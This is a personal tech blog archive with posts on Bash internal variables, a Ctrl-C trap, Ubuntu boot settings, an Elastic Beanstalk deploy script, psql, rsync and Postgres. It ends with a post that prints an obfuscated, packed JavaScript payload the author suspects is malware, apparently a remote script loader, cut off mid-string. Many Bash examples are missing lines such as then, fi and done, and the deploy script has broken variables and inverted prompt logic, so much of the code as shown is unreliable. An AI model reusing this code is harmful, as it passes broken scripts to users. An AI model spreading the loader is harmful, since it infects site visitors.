Friday, June 3, 2016

bash script variables

reposting this for the infinite-th time on the web

 taken from:

9.1. Internal Variables

Builtin variables:
variables affecting bash script behavior
The path to the Bash binary itself
bash$ echo $BASH
An environmental variable pointing to a Bash startup file to be read when a script is invoked
A variable indicating the subshell level. This is a new addition to Bash, version 3.
See Example 21-1 for usage.
Process ID of the current instance of Bash. This is not the same as the $$ variable, but it often gives the same result.

bash4$ echo $$

bash4$ echo $BASHPID

bash4$ ps ax | grep bash4
11015 pts/2    R      0:00 bash4
But ...

echo "\$\$ outside of subshell = $$"                              # 9602
echo "\$BASH_SUBSHELL  outside of subshell = $BASH_SUBSHELL"      # 0
echo "\$BASHPID outside of subshell = $BASHPID"                   # 9602


( echo "\$\$ inside of subshell = $$"                             # 9602
  echo "\$BASH_SUBSHELL inside of subshell = $BASH_SUBSHELL"      # 1
  echo "\$BASHPID inside of subshell = $BASHPID" )                # 9603
  # Note that $$ returns PID of parent process.
A 6-element array containing version information about the installed release of Bash. This is similar to $BASH_VERSION, below, but a bit more detailed.

# Bash version info:

for n in 0 1 2 3 4 5
  echo "BASH_VERSINFO[$n] = ${BASH_VERSINFO[$n]}"

# BASH_VERSINFO[0] = 3                      # Major version no.
# BASH_VERSINFO[1] = 00                     # Minor version no.
# BASH_VERSINFO[2] = 14                     # Patch level.
# BASH_VERSINFO[3] = 1                      # Build version.
# BASH_VERSINFO[4] = release                # Release status.
# BASH_VERSINFO[5] = i386-redhat-linux-gnu  # Architecture
                                            # (same as $MACHTYPE).
The version of Bash installed on the system

bash$ echo $BASH_VERSION

tcsh% echo $BASH_VERSION
BASH_VERSION: Undefined variable.
Checking $BASH_VERSION is a good method of determining which shell is running. $SHELL does not necessarily give the correct answer.
A colon-separated list of search paths available to the cd command, similar in function to the $PATH variable for binaries. The $CDPATH variable may be set in the local ~/.bashrc file.

bash$ cd bash-doc
bash: cd: bash-doc: No such file or directory

bash$ CDPATH=/usr/share/doc
bash$ cd bash-doc

bash$ echo $PWD
The top value in the directory stack [1] (affected by pushd and popd)
This builtin variable corresponds to the dirs command, however dirs shows the entire contents of the directory stack.
The default editor invoked by a script, usually vi or emacs.
"effective" user ID number
Identification number of whatever identity the current user has assumed, perhaps by means of su.
CautionThe $EUID is not necessarily the same as the $UID.
Name of the current function
xyz23 ()
  echo "$FUNCNAME now executing."  # xyz23 now executing.


                                   # Null value outside a function.
See also Example A-50.
A list of filename patterns to be excluded from matching in globbing.
Groups current user belongs to
This is a listing (array) of the group id numbers for current user, as recorded in /etc/passwd and /etc/group.

root# echo $GROUPS

root# echo ${GROUPS[1]}

root# echo ${GROUPS[5]}
Home directory of the user, usually /home/username (see Example 10-7)
The hostname command assigns the system host name at bootup in an init script. However, the gethostname() function sets the Bash internal variable $HOSTNAME. See also Example 10-7.
host type
Like $MACHTYPE, identifies the system hardware.
bash$ echo $HOSTTYPE
internal field separator
This variable determines how Bash recognizes fields, or word boundaries, when it interprets character strings.

$IFS defaults to whitespace (space, tab, and newline), but may be changed, for example, to parse a comma-separated data file. Note that $* uses the first character held in $IFS. See Example 5-1.

bash$ echo "$IFS"

(With $IFS set to default, a blank line displays.)

bash$ echo "$IFS" | cat -vte
(Show whitespace: here a single space, ^I [horizontal tab],
  and newline, and display "$" at end-of-line.)

bash$ bash -c 'set w x y z; IFS=":-;"; echo "$*"'
(Read commands from string and assign any arguments to pos params.)
Set $IFS to eliminate whitespace in pathnames.
IFS="$(printf '\n\t')"   # Per David Wheeler.
Caution$IFS does not handle whitespace the same as it does other characters.
Example 9-1. $IFS and whitespace


# The plus sign will be interpreted as a separator.
echo $var1     # a b c
echo $var2     # d-e-f
echo $var3     # g,h,i


# The plus sign reverts to default interpretation.
# The minus sign will be interpreted as a separator.
echo $var1     # a+b+c
echo $var2     # d e f
echo $var3     # g,h,i


# The comma will be interpreted as a separator.
# The minus sign reverts to default interpretation.
echo $var1     # a+b+c
echo $var2     # d-e-f
echo $var3     # g h i


IFS=" "
# The space character will be interpreted as a separator.
# The comma reverts to default interpretation.
echo $var1     # a+b+c
echo $var2     # d-e-f
echo $var3     # g,h,i

# ======================================================== #

# However ...
# $IFS treats whitespace differently than other characters.

  for arg
    echo "[$arg]"
  done #  ^    ^   Embed within brackets, for your viewing pleasure.

echo; echo "IFS=\" \""
echo "-------"

IFS=" "
var=" a  b c   "
#    ^ ^^   ^^^
output_args_one_per_line $var  # output_args_one_per_line `echo " a  b c   "`
# [a]
# [b]
# [c]

echo; echo "IFS=:"
echo "-----"

var=":a::b:c:::"               # Same pattern as above,
#    ^ ^^   ^^^                #+ but substituting ":" for " "  ...
output_args_one_per_line $var
# []
# [a]
# []
# [b]
# [c]
# []
# []

# Note "empty" brackets.
# The same thing happens with the "FS" field separator in awk.


(Many thanks, Stéphane Chazelas, for clarification and above examples.)
See also Example 16-41, Example 11-8, and Example 19-14 for instructive examples of using $IFS.
Ignore EOF: how many end-of-files (control-D) the shell will ignore before logging out.
Often set in the .bashrc or /etc/profile files, this variable controls collation order in filename expansion and pattern matching. If mishandled, LC_COLLATE can cause unexpected results in filename globbing.
NoteAs of version 2.05 of Bash, filename globbing no longer distinguishes between lowercase and uppercase letters in a character range between brackets. For example, ls [A-M]* would match both File1.txt and file1.txt. To revert to the customary behavior of bracket matching, set LC_COLLATE to C by an export LC_COLLATE=C in /etc/profile and/or ~/.bashrc.
This internal variable controls character interpretation in globbing and pattern matching.
This variable is the line number of the shell script in which this variable appears. It has significance only within the script in which it appears, and is chiefly useful for debugging purposes.
last_cmd_arg=$_  # Save it.

echo "At line number $LINENO, variable \"v1\" = $v1"
echo "Last command argument processed = $last_cmd_arg"
machine type
Identifies the system hardware.
bash$ echo $MACHTYPE
Old working directory ("OLD-Print-Working-Directory", previous directory you were in).
operating system type
bash$ echo $OSTYPE
Path to binaries, usually /usr/bin/, /usr/X11R6/bin/, /usr/local/bin, etc.
When given a command, the shell automatically does a hash table search on the directories listed in the path for the executable. The path is stored in the environmental variable, $PATH, a list of directories, separated by colons. Normally, the system stores the $PATH definition in /etc/profile and/or ~/.bashrc (see Appendix H).
bash$ echo $PATH
PATH=${PATH}:/opt/bin appends the /opt/bin directory to the current path. In a script, it may be expedient to temporarily add a directory to the path in this way. When the script exits, this restores the original $PATH (a child process, such as a script, may not change the environment of the parent process, the shell).

NoteThe current "working directory", ./, is usually omitted from the $PATH as a security measure.
Array variable holding exit status(es) of last executed foreground pipe.

bash$ echo $PIPESTATUS

bash$ ls -al | bogus_command
bash: bogus_command: command not found
bash$ echo ${PIPESTATUS[1]}

bash$ ls -al | bogus_command
bash: bogus_command: command not found
bash$ echo $?
The members of the $PIPESTATUS array hold the exit status of each respective command executed in a pipe. $PIPESTATUS[0] holds the exit status of the first command in the pipe, $PIPESTATUS[1] the exit status of the second command, and so on.
Caution The $PIPESTATUS variable may contain an erroneous 0 value in a login shell (in releases prior to 3.0 of Bash).

tcsh% bash

bash$ who | grep nobody | sort
bash$ echo ${PIPESTATUS[*]}
The above lines contained in a script would produce the expected 0 1 0 output.
Thank you, Wayne Pollock for pointing this out and supplying the above example.
NoteThe $PIPESTATUS variable gives unexpected results in some contexts.

bash$ echo $BASH_VERSION

bash$ $ ls | bogus_command | wc
bash: bogus_command: command not found
 0       0       0

bash$ echo ${PIPESTATUS[@]}
141 127 0
Chet Ramey attributes the above output to the behavior of ls. If ls writes to a pipe whose output is not read, then SIGPIPE kills it, and its exit status is 141. Otherwise its exit status is 0, as expected. This likewise is the case for tr.
Note$PIPESTATUS is a "volatile" variable. It needs to be captured immediately after the pipe in question, before any other command intervenes.

bash$ $ ls | bogus_command | wc
bash: bogus_command: command not found
 0       0       0

bash$ echo ${PIPESTATUS[@]}
0 127 0

bash$ echo ${PIPESTATUS[@]}
NoteThe pipefail option may be useful in cases where $PIPESTATUS does not give the desired information.
The $PPID of a process is the process ID (pid) of its parent process. [2]
Compare this with the pidof command.
A variable holding a command to be executed just before the primary prompt, $PS1 is to be displayed.
This is the main prompt, seen at the command-line.
The secondary prompt, seen when additional input is expected. It displays as ">".
The tertiary prompt, displayed in a select loop (see Example 11-30).
The quartenary prompt, shown at the beginning of each line of output when invoking a script with the -x [verbose trace] option. It displays as "+".
As a debugging aid, it may be useful to embed diagnostic information in $PS4.
P4='$(read time junk < /proc/$$/schedstat; echo "@@@ $time @@@ " )'
# Per suggestion by Erik Brandsberg.
set -x
# Various commands follow ...
Working directory (directory you are in at the time)
This is the analog to the pwd builtin command.


clear # Clear the screen.


cd $TargetDirectory
echo "Deleting stale files in $TargetDirectory."

if [ "$PWD" != "$TargetDirectory" ]
then    # Keep from wiping out wrong directory by accident.
  echo "Wrong directory!"
  echo "In $PWD, rather than $TargetDirectory!"
  echo "Bailing out!"

rm -rf *
rm .[A-Za-z0-9]*    # Delete dotfiles.
# rm -f .[^.]* ..?*   to remove filenames beginning with multiple dots.
# (shopt -s dotglob; rm -f *)   will also work.
# Thanks, S.C. for pointing this out.

#  A filename (`basename`) may contain all characters in the 0 - 255 range,
#+ except "/".
#  Deleting files beginning with weird characters, such as -
#+ is left as an exercise. (Hint: rm ./-weirdname or rm -- -weirdname)
result=$?   # Result of delete operations. If successful = 0.

ls -al              # Any files left?
echo "Done."
echo "Old files deleted in $TargetDirectory."

# Various other operations here, as necessary.

exit $result
The default value when a variable is not supplied to read. Also applicable to select menus, but only supplies the item number of the variable chosen, not the value of the variable itself.

# REPLY is the default value for a 'read' command.

echo -n "What is your favorite vegetable? "

echo "Your favorite vegetable is $REPLY."
#  REPLY holds the value of last "read" if and only if
#+ no variable supplied.

echo -n "What is your favorite fruit? "
read fruit
echo "Your favorite fruit is $fruit."
echo "but..."
echo "Value of \$REPLY is still $REPLY."
#  $REPLY is still set to its previous value because
#+ the variable $fruit absorbed the new "read" value.


exit 0
The number of seconds the script has been running.


echo "Hit Control-C to exit before $TIME_LIMIT seconds."

while [ "$SECONDS" -le "$TIME_LIMIT" ]
do   #   $SECONDS is an internal shell variable.
  if [ "$SECONDS" -eq 1 ]

  echo "This script has been running $SECONDS $units."
  #  On a slow or overburdened machine, the script may skip a count
  #+ every once in a while.
  sleep $INTERVAL

echo -e "\a"  # Beep!

exit 0
The list of enabled shell options, a readonly variable.
bash$ echo $SHELLOPTS
Shell level, how deeply Bash is nested. [3] If, at the command-line, $SHLVL is 1, then in a script it will increment to 2.
NoteThis variable is not affected by subshells. Use $BASH_SUBSHELL when you need an indication of subshell nesting.
If the $TMOUT environmental variable is set to a non-zero value time, then the shell prompt will time out after $time seconds. This will cause a logout.
As of version 2.05b of Bash, it is now possible to use $TMOUT in a script in combination with read.

# Works in scripts for Bash, versions 2.05b and later.

TMOUT=3    # Prompt times out at three seconds.

echo "What is your favorite song?"
echo "Quickly now, you only have $TMOUT seconds to answer!"
read song

if [ -z "$song" ]
  song="(no answer)"
  # Default response.

echo "Your favorite song is $song."

There are other, more complex, ways of implementing timed input in a script. One alternative is to set up a timing loop to signal the script when it times out. This also requires a signal handling routine to trap (see Example 32-5) the interrupt generated by the timing loop (whew!).
Example 9-2. Timed Input

# TMOUT=3    Also works, as of newer versions of Bash.

TIMELIMIT=3  # Three seconds in this instance.
             # May be set to different value.

  if [ "$answer" = TIMEOUT ]
    echo $answer
  else       # Don't want to mix up the two instances. 
    echo "Your favorite veggie is $answer"
    kill $!  #  Kills no-longer-needed TimerOn function
             #+ running in background.
             #  $! is PID of last job running in background.


  sleep $TIMELIMIT && kill -s 14 $$ &
  # Waits 3 seconds, then sends sigalarm to script.


trap Int14Vector $TIMER_INTERRUPT
# Timer interrupt (14) subverted for our purposes.

echo "What is your favorite vegetable "
read answer

#  Admittedly, this is a kludgy implementation of timed input.
#  However, the "-t" option to "read" simplifies this task.
#  See the "" script.
#  However, what about timing not just single user input,
#+ but an entire script?

#  If you need something really elegant ...
#+ consider writing the application in C or C++,
#+ using appropriate library functions, such as 'alarm' and 'setitimer.'

exit 0

An alternative is using stty.
Example 9-3. Once more, timed input

#  Written by Stephane Chazelas,
#+ and modified by the document author.

INTERVAL=5                # timeout interval

timedout_read() {
  old_tty_settings=`stty -g`
  stty -icanon min 0 time ${timeout}0
  eval read $varname      # or just  read $varname
  stty "$old_tty_settings"
  # See man page for "stty."

echo; echo -n "What's your name? Quick! "
timedout_read $INTERVAL your_name

#  This may not work on every terminal type.
#  The maximum timeout depends on the terminal.
#+ (it is often 25.5 seconds).


if [ ! -z "$your_name" ]  # If name input before timeout ...
  echo "Your name is $your_name."
  echo "Timed out."


# The behavior of this script differs somewhat from ""
# At each keystroke, the counter resets.

exit 0
Perhaps the simplest method is using the -t option to read.
Example 9-4. Timed read
# [time-out]
# Inspired by a suggestion from "syngin seven" (thanks).

TIMELIMIT=4         # 4 seconds

read -t $TIMELIMIT variable <&1
#                           ^^^
#  In this instance, "<&1" is needed for Bash 1.x and 2.x,
#  but unnecessary for Bash 3+.


if [ -z "$variable" ]  # Is null?
  echo "Timed out, variable still unset."
  echo "variable = $variable"

exit 0
User ID number
Current user's user identification number, as recorded in /etc/passwd
This is the current user's real id, even if she has temporarily assumed another identity through su. $UID is a readonly variable, not subject to change from the command line or within a script, and is the counterpart to the id builtin.
Example 9-5. Am I root?
#   Am I root or not?

ROOT_UID=0   # Root has $UID 0.

if [ "$UID" -eq "$ROOT_UID" ]  # Will the real "root" please stand up?
  echo "You are root."
  echo "You are just an ordinary user (but mom loves you just the same)."

exit 0

# ============================================================= #
# Code below will not execute, because the script already exited.

# An alternate method of getting to the root of matters:


username=`id -nu`              # Or...   username=`whoami`
if [ "$username" = "$ROOTUSER_NAME" ]
  echo "Rooty, toot, toot. You are root."
  echo "You are just a regular fella."
See also Example 2-3.
NoteThe variables $ENV, $LOGNAME, $MAIL, $TERM, $USER, and $USERNAME are not Bash builtins. These are, however, often set as environmental variables in one of the Bash or login startup files. $SHELL, the name of the user's login shell, may be set from /etc/passwd or in an "init" script, and it is likewise not a Bash builtin.

tcsh% echo $LOGNAME
tcsh% echo $SHELL
tcsh% echo $TERM

bash$ echo $LOGNAME
bash$ echo $SHELL
bash$ echo $TERM
Positional Parameters
$0, $1, $2, etc.
Positional parameters, passed from command line to script, passed to a function, or set to a variable (see Example 4-5 and Example 15-16)
Number of command-line arguments [4] or positional parameters (see Example 36-2)
All of the positional parameters, seen as a single word
Note"$*" must be quoted.
Same as $*, but each parameter is a quoted string, that is, the parameters are passed on intact, without interpretation or expansion. This means, among other things, that each parameter in the argument list is seen as a separate word.
NoteOf course, "$@" should be quoted.
Example 9-6. arglist: Listing arguments with $* and $@
# Invoke this script with several arguments, such as "one two three" ...


if [ ! -n "$1" ]
  echo "Usage: `basename $0` argument1 argument2 etc."
  exit $E_BADARGS


index=1          # Initialize count.

echo "Listing args with \"\$*\":"
for arg in "$*"  # Doesn't work properly if "$*" isn't quoted.
  echo "Arg #$index = $arg"
  let "index+=1"
done             # $* sees all arguments as single word. 
echo "Entire arg list seen as single word."


index=1          # Reset count.
                 # What happens if you forget to do this?

echo "Listing args with \"\$@\":"
for arg in "$@"
  echo "Arg #$index = $arg"
  let "index+=1"
done             # $@ sees arguments as separate words. 
echo "Arg list seen as separate words."


index=1          # Reset count.

echo "Listing args with \$* (unquoted):"
for arg in $*
  echo "Arg #$index = $arg"
  let "index+=1"
done             # Unquoted $* sees arguments as separate words. 
echo "Arg list seen as separate words."

exit 0
Following a shift, the $@ holds the remaining command-line parameters, lacking the previous $1, which was lost.
# Invoke with ./scriptname 1 2 3 4 5

echo "$@"    # 1 2 3 4 5
echo "$@"    # 2 3 4 5
echo "$@"    # 3 4 5

# Each "shift" loses parameter $1.
# "$@" then contains the remaining parameters.
The $@ special parameter finds use as a tool for filtering input into shell scripts. The cat "$@" construction accepts input to a script either from stdin or from files given as parameters to the script. See Example 16-24 and Example 16-25.
CautionThe $* and $@ parameters sometimes display inconsistent and puzzling behavior, depending on the setting of $IFS.
Example 9-7. Inconsistent $* and $@ behavior

#  Erratic behavior of the "$*" and "$@" internal Bash variables,
#+ depending on whether or not they are quoted.
#  Demonstrates inconsistent handling of word splitting and linefeeds.

set -- "First one" "second" "third:one" "" "Fifth: :one"
# Setting the script arguments, $1, $2, $3, etc.


echo 'IFS unchanged, using "$*"'
for i in "$*"               # quoted
do echo "$((c+=1)): [$i]"   # This line remains the same in every instance.
                            # Echo args.
echo ---

echo 'IFS unchanged, using $*'
for i in $*                 # unquoted
do echo "$((c+=1)): [$i]"
echo ---

echo 'IFS unchanged, using "$@"'
for i in "$@"
do echo "$((c+=1)): [$i]"
echo ---

echo 'IFS unchanged, using $@'
for i in $@
do echo "$((c+=1)): [$i]"
echo ---

echo 'IFS=":", using "$*"'
for i in "$*"
do echo "$((c+=1)): [$i]"
echo ---

echo 'IFS=":", using $*'
for i in $*
do echo "$((c+=1)): [$i]"
echo ---

echo 'IFS=":", using "$var" (var=$*)'
for i in "$var"
do echo "$((c+=1)): [$i]"
echo ---

echo 'IFS=":", using $var (var=$*)'
for i in $var
do echo "$((c+=1)): [$i]"
echo ---

echo 'IFS=":", using $var (var="$*")'
for i in $var
do echo "$((c+=1)): [$i]"
echo ---

echo 'IFS=":", using "$var" (var="$*")'
for i in "$var"
do echo "$((c+=1)): [$i]"
echo ---

echo 'IFS=":", using "$@"'
for i in "$@"
do echo "$((c+=1)): [$i]"
echo ---

echo 'IFS=":", using $@'
for i in $@
do echo "$((c+=1)): [$i]"
echo ---

echo 'IFS=":", using $var (var=$@)'
for i in $var
do echo "$((c+=1)): [$i]"
echo ---

echo 'IFS=":", using "$var" (var=$@)'
for i in "$var"
do echo "$((c+=1)): [$i]"
echo ---

echo 'IFS=":", using "$var" (var="$@")'
for i in "$var"
do echo "$((c+=1)): [$i]"
echo ---

echo 'IFS=":", using $var (var="$@")'
for i in $var
do echo "$((c+=1)): [$i]"


# Try this script with ksh or zsh -y.

exit 0

#  This example script written by Stephane Chazelas,
#+ and slightly modified by the document author.
NoteThe $@ and $* parameters differ only when between double quotes.
Example 9-8. $* and $@ when $IFS is empty

#  If $IFS set, but empty,
#+ then "$*" and "$@" do not echo positional params as expected.

mecho ()       # Echo positional parameters.
echo "$1,$2,$3";

IFS=""         # Set, but empty.
set a b c      # Positional parameters.

mecho "$*"     # abc,,
#                   ^^
mecho $*       # a,b,c

mecho $@       # a,b,c
mecho "$@"     # a,b,c

#  The behavior of $* and $@ when $IFS is empty depends
#+ on which Bash or sh version being run.
#  It is therefore inadvisable to depend on this "feature" in a script.

# Thanks, Stephane Chazelas.

Other Special Parameters
Flags passed to script (using set). See Example 15-16.
CautionThis was originally a ksh construct adopted into Bash, and unfortunately it does not seem to work reliably in Bash scripts. One possible use for it is to have a script self-test whether it is interactive.
PID (process ID) of last job run in background


COMMAND1="sleep 100"

echo "Logging PIDs background commands for script: $0" >> "$LOG"
# So they can be monitored, and killed as necessary.
echo >> "$LOG"

# Logging commands.

echo -n "PID of \"$COMMAND1\":  " >> "$LOG"
echo $! >> "$LOG"
# PID of "sleep 100":  1506

# Thank you, Jacques Lederer, for suggesting this.
Using $! for job control:

possibly_hanging_job & { sleep ${TIMEOUT}; eval 'kill -9 $!' &> /dev/null; }
# Forces completion of an ill-behaved program.
# Useful, for example, in init scripts.

# Thank you, Sylvain Fourmanoit, for this creative use of the "!" variable.
Or, alternately:

# This example by Matthew Sage.
# Used with permission.

TIMEOUT=30   # Timeout value in seconds

possibly_hanging_job & {
        while ((count < TIMEOUT )); do
                eval '[ ! -d "/proc/$!" ] && ((count = TIMEOUT))'
                # /proc is where information about running processes is found.
                # "-d" tests whether it exists (whether directory exists).
                # So, we're waiting for the job in question to show up.
                sleep 1
        eval '[ -d "/proc/$!" ] && kill -15 $!'
        # If the hanging job is running, kill it.

#  -------------------------------------------------------------- #

#  However, this may not not work as specified if another process
#+ begins to run after the "hanging_job" . . .
#  In such a case, the wrong job may be killed.
#  Ariel Meragelman suggests the following fix.

# Timeout value in seconds
possibly_hanging_job & {

while ((count < TIMEOUT )); do
  eval '[ ! -d "/proc/$lastjob" ] && ((count = TIMEOUT))'
  sleep 1
eval '[ -d "/proc/$lastjob" ] && kill -15 $lastjob'


Special variable set to final argument of previous command executed.
Example 9-9. Underscore variable

echo $_              #  /bin/bash
                     #  Just called /bin/bash to run the script.
                     #  Note that this will vary according to
                     #+ how the script is invoked.

du >/dev/null        #  So no output from command.
echo $_              #  du

ls -al >/dev/null    #  So no output from command.
echo $_              #  -al  (last argument)

echo $_              #  :
Exit status of a command, function, or the script itself (see Example 24-7)
Process ID (PID) of the script itself. [5] The $$ variable often finds use in scripts to construct "unique" temp file names (see Example 32-6, Example 16-31, and Example 15-27). This is usually simpler than invoking mktemp.


[1] A stack register is a set of consecutive memory locations, such that the values stored (pushed) are retrieved (popped) in reverse order. The last value stored is the first retrieved. This is sometimes called a LIFO (last-in-first-out) or pushdown stack.
[2]The PID of the currently running script is $$, of course.
[3] Somewhat analogous to recursion, in this context nesting refers to a pattern embedded within a larger pattern. One of the definitions of nest, according to the 1913 edition of Webster's Dictionary, illustrates this beautifully: "A collection of boxes, cases, or the like, of graduated size, each put within the one next larger."
[4]The words "argument" and "parameter" are often used interchangeably. In the context of this document, they have the same precise meaning: a variable passed to a script or function.
[5]Within a script, inside a subshell, $$ returns the PID of the script, not the subshell.

cancel script completely on ctrl-c

I found this question interesting: basically how to cancel completely a script and all child processes :

You do this by creating a subroutine you want to call when SIGINT is received, and you need to run trap 'subroutinename' INT.

    echo "Interrupted."
    # Kill the parent process of the script.
    kill $PPID
    exit 1
trap 'int_handler' INT

while true; do
    sleep 1
    echo "I'm still alive!"

# We never reach this part.
exit 0
Taken from: 

Saturday, May 14, 2016

linux root user aliases

So I was getting crazier about an email bounce I was receiving, and I didnt know the cause.

It turns our that in /etc/aliases file, you can configure the alias to the users...

Wednesday, February 10, 2016

boot ubuntu 11.04 desktop direct into console (text) but switch to GUI whenever you want

I followed this steps to boot directly into console mode... After lofin, the command startx shows the GUI..

taken from:

 did following
Step 1 First update your repository by running
sudo apt-get update
Step 2 There is some bug in old version of lightdm, so we need to upgrade the same. To do so run,
sudo apt-get install lightdm
Step 3 Now we have to modify grub config. Step 3a Open /etc/default/grub with your faviourite editor and change
Step 3b Also comment GRUB_HIDDEN_TIMEOUT=0 This line is for unhiding the GRUB menu
Step 4 Now we will upgrade GRUB configuration
sudo update-grub
Step 5 Ubuntu 11.10 Desktop edition use lightdm for GUI. We need to disable the same
sudo update-rc.d -f lightdm remove
Step 6 Now restart your machine.

Monday, February 8, 2016

script to push to Amazon Elastic Beanstalk (EB) using the CLI and Git with downtime (swapping environments)

I wanted to automate pushing to my Elastic Beanstalk Amazon environment...

here is the simple script I came up with:

- you should be able to upload a new version already using Git
- have the EB CLI 3.7.2 (Python 3.4.3) configured in the directory where you are running this script

- copy this script into the directory that you are going to upload
- give the script execution permissions
- eb list should have a current environment (depicted with a '*')

set -e
#get the current environment
/usr/local/bin/eb list > temp_environment
temp_environment=$(grep \* temp_environment | cut -f2 -d" ")

echo "detected environment ->$temp_environment<-"
echo "subtitute this environment y/N"

read answer

if [ "$
answer" =  "y" ]; then
        echo "your answer was $
answer. byee!"
        exit 1

echo "substituting environmet with current version"


sufijo=`date +%a%y%m%d%H%M%S`

ambiente_sin_sufijo=$(echo $temp_environment | cut -d"-" -f1)
sufijo_ambiente=$(echo $temp_environment | cut -d"-" -f2)

dayname=$(echo $sufijo_ambiente | cut -c1-3)
year=$(echo $sufijo_ambiente | cut -c4-5)
mon=$(echo $sufijo_ambiente | cut -c6-7)
day=$(echo $sufijo_ambiente | cut -c8-9)
hour=$(echo $sufijo_ambiente | cut -c10-11)
min=$(echo $sufijo_ambiente | cut -c12-13)
sec=$(echo $sufijo_ambiente | cut -c14-15)

set -x

echo "New version uploaded to EB: `date`" > gitlog.temp
echo ""  >> gitlog.temp
echo "The files that changed since last time are:"   >> gitlog.temp
echo ""   >> gitlog.temp

set -f
git log --name-only --no-color --graph '--pretty=format:%h - %s' --abbrev-commit --since "20$year-$mon-$day $hour:$min:$sec" >> gitlog.temp


echo "Deploying to: $ambiente_final and then swapping with: $temp_environment"
echo "do you wish to continue? s/N"

read respuesta

if [ "$respuesta" =  "s" ]; then
        echo "su respuesta fue $respuesta, entonces salimos. chao!"
        exit 1

set -x

eb clone "$temp_environment" -n "$ambiente_final" --timeout 15 || exit 1
eb deploy "$ambiente_final" || exit 1
eb swap "$temp_environment" -n "$ambiente_final" || exit 1
eb use "$ambiente_final" || exit 1

set +x

echo FINISHED !!!
echo "Remember to execute -> eb terminate $temp_environment <-"

mail -s "New version" -r "Auto Uploader<>" < gitlog.temp

rm gitlog.temp

send text file contents throught mail in bash mail

turns out it is quite simple:

for example:

mail -s 'Uptime Report' -c < /tmp/output.txt

taken from:

Monday, November 30, 2015

using the COPY command in psql client (postgresql)

Useful to export/import data

Here is the syntax for COPY, as returned by the 8.3 client:
db=# \h COPY
Command:     COPY
Description: copy data between a file and a table
COPY tablename [ ( column [, ...] ) ]
    FROM { 'filename' | STDIN }
    [ [ WITH ] 
          [ BINARY ]
          [ OIDS ]
          [ DELIMITER [ AS ] 'delimiter' ]
          [ NULL [ AS ] 'null string' ]
          [ CSV [ HEADER ]
                [ QUOTE [ AS ] 'quote' ] 
                [ ESCAPE [ AS ] 'escape' ]
                [ FORCE NOT NULL column [, ...] ]

COPY { tablename [ ( column [, ...] ) ] | ( query ) }
    TO { 'filename' | STDOUT }
    [ [ WITH ] 
          [ BINARY ]
          [ OIDS ]
          [ DELIMITER [ AS ] 'delimiter' ]
          [ NULL [ AS ] 'null string' ]
          [ CSV [ HEADER ]
                [ QUOTE [ AS ] 'quote' ] 
                [ ESCAPE [ AS ] 'escape' ]
                [ FORCE QUOTE column [, ...] ]

Sunday, November 29, 2015

Re Blog - Remove the Endnote Separator Line in Word 2013

I finally found a way to remove the annoying end note separator (line) in Word 2013

It was here:

  1. Go to View->Draft
  2. References->Show Footnotes
  3. Delete the footnote separator
VoilĂ !

Remove the Endnote Separator Line in Word 2013

Follow these steps to remove the Endnote separator line in Word 2013.
  1. Below is an example of an endnote separator line. (Below the words "Human Resources") *Note the endnotes are in green.

  2. Select the View tab. From the Views group, select Draft.

  3. To display the Endnote options, select the Reference tab, and then "Show Notes" from the Footnotes group.


  4. From the Endnotes drop-down box, select "Endnote Separator".  Select the separator line and press your delete key.


  5. Switch back to Page Layout view and note that the separator line has been deleted.


Wednesday, September 30, 2015

Rsync tricks and how to rsync only one type of files by extension

Rsync is a wonderful tool. It has many options.

But to sync only a file type among many files in a dir eluded me.

After some googling I found this command:

rsync -rv --include '*/' --include '*.js' --exclude '*' --prune-empty-dirs Source/ Target/

I found it on this blog:

How to rsync only one type of files by extension

Having a file structure full of various file types you want to sync only files of one type into a new location.
rsync -rv --include '*/' --include '*.js' --exclude '*' --prune-empty-dirs Source/ Target/
This will generate the same structure found in Source into Target but only including the JavaScript(.js) files.
Note the usage of ' around the arguments containing * since we don't want it to be expanded in a bash shell.
The first --include '*/' is to make sure sub-directories are scanned. This would also include all directories does not include the file you want resulting in empty directories in Target. To remove these empty directories we use --prune-empty-dirs
The --include '*.js' is rather self explanatory, and you can add more as you need.
Finally we exclude all other files we don't want using --exclude '*'

Thank you very much!

Monday, August 3, 2015

Owner of tables in postgresql

I though of re blogging this:

Although for some strange reason the particular table I want to know the owner does not appear in the list, yet all other ones do (oh, Murphy!)

select t.table_name, t.table_type, c.relname, c.relowner, u.usename
from information_schema.tables t
join pg_catalog.pg_class c on (t.table_name = c.relname)
join pg_catalog.pg_user u on (c.relowner = u.usesysid)
where t.table_schema='public';

Thursday, June 25, 2015

How to analyze obfuscated javascript to see if it's malware

UPDATE: I think know that the ClamAV antivirus tool is much better way to deal with this...

I had to analyze a obfuscated javascript code.

I found a nifty tool to do the job:

Here are before... this I believe is malware...

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('12(T(p,a,c,k,e,d){e=T(c){U(c<a?\'\':e(1f(c/a)))+((c=c%a)>1e?W.1d(c+1h):c.13(11))};X(!\'\'.V(/^/,W)){Y(c--){d[e(c)]=k[c]||e(c)}k=[T(e){U d[e]}];e=T(){U\'\\\\w+\'};c=1};Y(c--){X(k[c]){p=p.V(10 14(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}U p}(\'v(l(p,a,c,k,e,d){e=l(c){m c.n(z)};q(!\\\'\\\'.t(/^/,B)){r(c--){d[c.n(a)]=k[c]||c.n(a)}k=[l(e){m d[e]}];e=l(){m\\\'\\\\\\\\w+\\\'};c=1};r(c--){q(k[c]){p=p.t(C D(\\\'\\\\\\\\b\\\'+e(c)+\\\'\\\\\\\\b\\\',\\\'g\\\'),k[c])}}m p}(\\\'1 4=4||[];(b(){1 2=5.e(\\\\\\\'7\\\\\\\');2.a=\\\\\\\'8://9.d.f/k.6?//i.6?g\\\\\\\';1 